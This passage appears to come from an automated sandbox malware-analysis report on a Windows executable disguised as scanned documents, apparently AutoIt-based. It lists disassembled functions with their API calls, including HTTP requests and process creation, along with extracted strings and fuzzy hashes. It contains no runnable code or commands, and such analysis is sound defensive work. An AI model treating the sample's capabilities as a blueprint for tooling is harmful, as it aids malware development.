                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 003184CA
                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00318501
                                                      • FreeLibrary.KERNEL32(?), ref: 0031850D
                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0031851D
                                                      • DestroyIcon.USER32(?), ref: 0031852C
                                                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00318549
                                                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00318555
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                      • String ID: .dll$.exe$.icl
                                                      • API String ID: 799131459-1154884017
                                                      • Opcode ID: e4e0cb9a3e3acee77aa30184e3450db8a92b49f720eac68d7e2099b8fdc7d9b2
                                                      • Instruction ID: aa0fe2b62b3674384745ad273404e9817b227c7947cf0027876cbf670a5cef98
                                                      • Opcode Fuzzy Hash: e4e0cb9a3e3acee77aa30184e3450db8a92b49f720eac68d7e2099b8fdc7d9b2
                                                      • Instruction Fuzzy Hash: 5A61BC71550205BAEB1A9F65CC81BFE77ACFB09B21F108609F815D60D1DFB4AA90CBA4
                                                      Function 00287778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                      • API String ID: 0-1645009161
                                                      • Opcode ID: 41fed5ef5abb5c37c1e9f0c67d5fb586fb0508dac45d24a0fd946a815e82a873
                                                      • Instruction ID: 2bc470ba1ff919515e76a5f457e613dedf6370ca56337d5d8cd03805cdca46b8
                                                      • Opcode Fuzzy Hash: 41fed5ef5abb5c37c1e9f0c67d5fb586fb0508dac45d24a0fd946a815e82a873
                                                      • Instruction Fuzzy Hash: AB810675675616ABDB11BF60CD42FEE77A8AF15300F144024FC08AA1D6EB70D9B1CBA1
                                                      Function 002E5A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadIconW.USER32(00000063), ref: 002E5A2E
                                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 002E5A40
                                                      • SetWindowTextW.USER32(?,?), ref: 002E5A57
                                                      • GetDlgItem.USER32(?,000003EA), ref: 002E5A6C
                                                      • SetWindowTextW.USER32(00000000,?), ref: 002E5A72
                                                      • GetDlgItem.USER32(?,000003E9), ref: 002E5A82
                                                      • SetWindowTextW.USER32(00000000,?), ref: 002E5A88
                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 002E5AA9
                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 002E5AC3
                                                      • GetWindowRect.USER32(?,?), ref: 002E5ACC
                                                      • _wcslen.LIBCMT ref: 002E5B33
                                                      • SetWindowTextW.USER32(?,?), ref: 002E5B6F
                                                      • GetDesktopWindow.USER32 ref: 002E5B75
                                                      • GetWindowRect.USER32(00000000), ref: 002E5B7C
                                                      • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 002E5BD3
                                                      • GetClientRect.USER32(?,?), ref: 002E5BE0
                                                      • PostMessageW.USER32(?,00000005,00000000,?), ref: 002E5C05
                                                      • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 002E5C2F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                      • String ID:
                                                      • API String ID: 895679908-0
                                                      • Opcode ID: 558129a6232681358a874619e58dd9fa30f87fbc330cbd2ef55eaadea05dd8a7
                                                      • Instruction ID: e0e1fa42aa48d40ff187bea8033caee90723c2a9c008b1cb73fe8c3066bc5761
                                                      • Opcode Fuzzy Hash: 558129a6232681358a874619e58dd9fa30f87fbc330cbd2ef55eaadea05dd8a7
                                                      • Instruction Fuzzy Hash: B571AF31960B56AFCB21DFA9CE85AAEBBF9FF48708F10451CE142A21A0D774E910CF50
                                                      Function 002E30F7 Relevance: 26.6, APIs: 8, Strings: 7, Instructions: 400COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: _wcslen
                                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[4
                                                      • API String ID: 176396367-3247088587
                                                      • Opcode ID: 89dd870b639a314eaf8825756ceffccd6edcb63820f16cb283b11d137732fb6b
                                                      • Instruction ID: b71dd4e9dbb50c3fdfb2ac57e9fa18e3d156ebc72c0471d75f8cf174c71d6281
                                                      • Opcode Fuzzy Hash: 89dd870b639a314eaf8825756ceffccd6edcb63820f16cb283b11d137732fb6b
                                                      • Instruction Fuzzy Hash: 57E14832A60557ABCB14DF76C449BEEF7B0BF04711F948129E456E7280DF30AE658B90
                                                      Function 002A00C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 002A00C6
                                                        • Part of subcall function 002A00ED: InitializeCriticalSectionAndSpinCount.KERNEL32(0035070C,00000FA0,111BB98E,?,?,?,?,002C23B3,000000FF), ref: 002A011C
                                                        • Part of subcall function 002A00ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,002C23B3,000000FF), ref: 002A0127
                                                        • Part of subcall function 002A00ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,002C23B3,000000FF), ref: 002A0138
                                                        • Part of subcall function 002A00ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 002A014E
                                                        • Part of subcall function 002A00ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 002A015C
                                                        • Part of subcall function 002A00ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 002A016A
                                                        • Part of subcall function 002A00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 002A0195
                                                        • Part of subcall function 002A00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 002A01A0
                                                      • ___scrt_fastfail.LIBCMT ref: 002A00E7
                                                        • Part of subcall function 002A00A3: __onexit.LIBCMT ref: 002A00A9
                                                      Strings
                                                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 002A0122
                                                      • kernel32.dll, xrefs: 002A0133
                                                      • WakeAllConditionVariable, xrefs: 002A0162
                                                      • SleepConditionVariableCS, xrefs: 002A0154
                                                      • InitializeConditionVariable, xrefs: 002A0148
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                      • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                      • API String ID: 66158676-1714406822
                                                      • Opcode ID: 3603ee2e4502f501872b77767196a1824e76c1f070ac981a826829bf38b2c6d2
                                                      • Instruction ID: 1884aed61a87833458110ffa73eeafc7c63522f10a865c39cd6e1a961c9573ea
                                                      • Opcode Fuzzy Hash: 3603ee2e4502f501872b77767196a1824e76c1f070ac981a826829bf38b2c6d2
                                                      • Instruction Fuzzy Hash: 4521F9326A47116FD7165F64AC86FE933A8DB0EB51F004139F805D62A1DF6598108E90
                                                      Function 002F44C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CharLowerBuffW.USER32(00000000,00000000,0031CC08), ref: 002F4527
                                                      • _wcslen.LIBCMT ref: 002F453B
                                                      • _wcslen.LIBCMT ref: 002F4599
                                                      • _wcslen.LIBCMT ref: 002F45F4
                                                      • _wcslen.LIBCMT ref: 002F463F
                                                      • _wcslen.LIBCMT ref: 002F46A7
                                                        • Part of subcall function 0029F9F2: _wcslen.LIBCMT ref: 0029F9FD
                                                      • GetDriveTypeW.KERNEL32(?,00346BF0,00000061), ref: 002F4743
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$BuffCharDriveLowerType
                                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                      • API String ID: 2055661098-1000479233
                                                      • Opcode ID: e0139260e35e9b3d2e7d779e0535214581b2a67d378074474d6c1e1ccb1c3e7a
                                                      • Instruction ID: 2e3066e379d5c17f0561698c8c2d5842289f87bbfc5620c76549ad9b04ba97a4
                                                      • Opcode Fuzzy Hash: e0139260e35e9b3d2e7d779e0535214581b2a67d378074474d6c1e1ccb1c3e7a
                                                      • Instruction Fuzzy Hash: 23B113356283069BC710FF28C89097BF7E4AFA67A0F50492DF696C7291D7B0D864CB52
                                                      Function 0031911E Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 181windowfileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00299BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00299BB2
                                                      • DragQueryPoint.SHELL32(?,?), ref: 00319147
                                                        • Part of subcall function 00317674: ClientToScreen.USER32(?,?), ref: 0031769A
                                                        • Part of subcall function 00317674: GetWindowRect.USER32(?,?), ref: 00317710
                                                        • Part of subcall function 00317674: PtInRect.USER32(?,?,00318B89), ref: 00317720
                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 003191B0
                                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 003191BB
                                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 003191DE
                                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00319225
                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 0031923E
                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00319255
                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00319277
                                                      • DragFinish.SHELL32(?), ref: 0031927E
                                                      • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00319371
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#5
                                                      • API String ID: 221274066-653977726
                                                      • Opcode ID: 83e4ad5879346f49362b99f46a24d2e608fcf1fc5a38891bbdff2da6930d4374
                                                      • Instruction ID: bc178f2bbd6e39acfc09b053d0f7878f4f05f8a6af9f4ebf9e1287ae219613b9
                                                      • Opcode Fuzzy Hash: 83e4ad5879346f49362b99f46a24d2e608fcf1fc5a38891bbdff2da6930d4374
                                                      • Instruction Fuzzy Hash: 50618C71108301AFD706EF60DC85EAFBBE8EF89750F04092EF595971A0DB309A99CB52
                                                      Function 0030AFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _wcslen.LIBCMT ref: 0030B198
                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0030B1B0
                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0030B1D4
                                                      • _wcslen.LIBCMT ref: 0030B200
                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0030B214
                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0030B236
                                                      • _wcslen.LIBCMT ref: 0030B332
                                                        • Part of subcall function 002F05A7: GetStdHandle.KERNEL32(000000F6), ref: 002F05C6
                                                      • _wcslen.LIBCMT ref: 0030B34B
                                                      • _wcslen.LIBCMT ref: 0030B366
                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0030B3B6
                                                      • GetLastError.KERNEL32(00000000), ref: 0030B407
                                                      • CloseHandle.KERNEL32(?), ref: 0030B439
                                                      • CloseHandle.KERNEL32(00000000), ref: 0030B44A
                                                      • CloseHandle.KERNEL32(00000000), ref: 0030B45C
                                                      • CloseHandle.KERNEL32(00000000), ref: 0030B46E
                                                      • CloseHandle.KERNEL32(?), ref: 0030B4E3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                      • String ID:
                                                      • API String ID: 2178637699-0
                                                      • Opcode ID: 7c0dd0bd66c024a8a29e95fa3a548d996beb5af335a926e0c624703235e6e2bf
                                                      • Instruction ID: 48d5468a864102cda6eb085676eef5c2dea3694bbf90bf619da451704f754057
                                                      • Opcode Fuzzy Hash: 7c0dd0bd66c024a8a29e95fa3a548d996beb5af335a926e0c624703235e6e2bf
                                                      • Instruction Fuzzy Hash: 88F1AB356193409FCB16EF24C891B6ABBE4AF85710F19885DF8958B2E2DB31EC50CF52
                                                      Function 0028326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetMenuItemCount.USER32(00351990), ref: 002C2F8D
                                                      • GetMenuItemCount.USER32(00351990), ref: 002C303D
                                                      • GetCursorPos.USER32(?), ref: 002C3081
                                                      • SetForegroundWindow.USER32(00000000), ref: 002C308A
                                                      • TrackPopupMenuEx.USER32(00351990,00000000,?,00000000,00000000,00000000), ref: 002C309D
                                                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 002C30A9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                      • String ID: 0
                                                      • API String ID: 36266755-4108050209
                                                      • Opcode ID: 460a2b9ec81955756fa029b72617e51866727631ead0f3d966e6b717857c31c2
                                                      • Instruction ID: 28b4bc5f9a0293b2f233f2261e5e1c490732591a3daa1bd64d6d56430448263d
                                                      • Opcode Fuzzy Hash: 460a2b9ec81955756fa029b72617e51866727631ead0f3d966e6b717857c31c2
                                                      • Instruction Fuzzy Hash: 0E71F971665206BEEB21DF29CC49F9ABF69FF05724F20421AF514661E0CBB1AD34CB90
                                                      Function 00316CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DestroyWindow.USER32(?,?), ref: 00316DEB
                                                        • Part of subcall function 00286B57: _wcslen.LIBCMT ref: 00286B6A
                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00316E5F
                                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00316E81
                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00316E94
                                                      • DestroyWindow.USER32(?), ref: 00316EB5
                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00280000,00000000), ref: 00316EE4
                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00316EFD
                                                      • GetDesktopWindow.USER32 ref: 00316F16
                                                      • GetWindowRect.USER32(00000000), ref: 00316F1D
                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00316F35
                                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00316F4D
                                                        • Part of subcall function 00299944: GetWindowLongW.USER32(?,000000EB), ref: 00299952
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                      • String ID: 0$tooltips_class32
                                                      • API String ID: 2429346358-3619404913
                                                      • Opcode ID: f923e32ef6a31f61c6c855c91ada160a3fc70eb9fd24058e17e43ae17aa37943
                                                      • Instruction ID: 79ab1dcbbfc43639847e40cdb9d3e8e59db5fc3311d696fccdfe411bde800337
                                                      • Opcode Fuzzy Hash: f923e32ef6a31f61c6c855c91ada160a3fc70eb9fd24058e17e43ae17aa37943
                                                      • Instruction Fuzzy Hash: 99717674244340AFDB26CF58DC59BAABBE9FB8D304F04451DF999872A1C770A946CB11
                                                      Function 002FC476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 002FC4B0
                                                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 002FC4C3
                                                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 002FC4D7
                                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 002FC4F0
                                                      • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 002FC533
                                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 002FC549
                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002FC554
                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 002FC584
                                                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 002FC5DC
                                                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 002FC5F0
                                                      • InternetCloseHandle.WININET(00000000), ref: 002FC5FB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                      • String ID:
                                                      • API String ID: 3800310941-3916222277
                                                      • Opcode ID: 63edb71e005d9d26146bc929f562f632bed305ebfd0f156abf980e2dbc8f0bae
                                                      • Instruction ID: 17082d751f40edda532746a50338e7d8cf23f5648643e20196fd92cbf7dca98f
                                                      • Opcode Fuzzy Hash: 63edb71e005d9d26146bc929f562f632bed305ebfd0f156abf980e2dbc8f0bae
                                                      • Instruction Fuzzy Hash: 685171B056020DBFDB228F60CA48ABBBBBCFF08794F109429FA45D6150D775E914DB60
                                                      Function 0031856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00318592
                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 003185A2
                                                      • GlobalAlloc.KERNEL32(00000002,00000000), ref: 003185AD
                                                      • CloseHandle.KERNEL32(00000000), ref: 003185BA
                                                      • GlobalLock.KERNEL32(00000000), ref: 003185C8
                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 003185D7
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 003185E0
                                                      • CloseHandle.KERNEL32(00000000), ref: 003185E7
                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 003185F8
                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,0031FC38,?), ref: 00318611
                                                      • GlobalFree.KERNEL32(00000000), ref: 00318621
                                                      • GetObjectW.GDI32(?,00000018,000000FF), ref: 00318641
                                                      • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00318671
                                                      • DeleteObject.GDI32(00000000), ref: 00318699
                                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 003186AF
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                      • String ID:
                                                      • API String ID: 3840717409-0
                                                      • Opcode ID: 4a187bea2ea3fac36b6f87e2d5ce8812d27cc165af5eaec11d739721eef47d22
                                                      • Instruction ID: 069112070ad4aaca79b7a6dc96b51b37ec1dc7a81286daa66174655a177b27f6
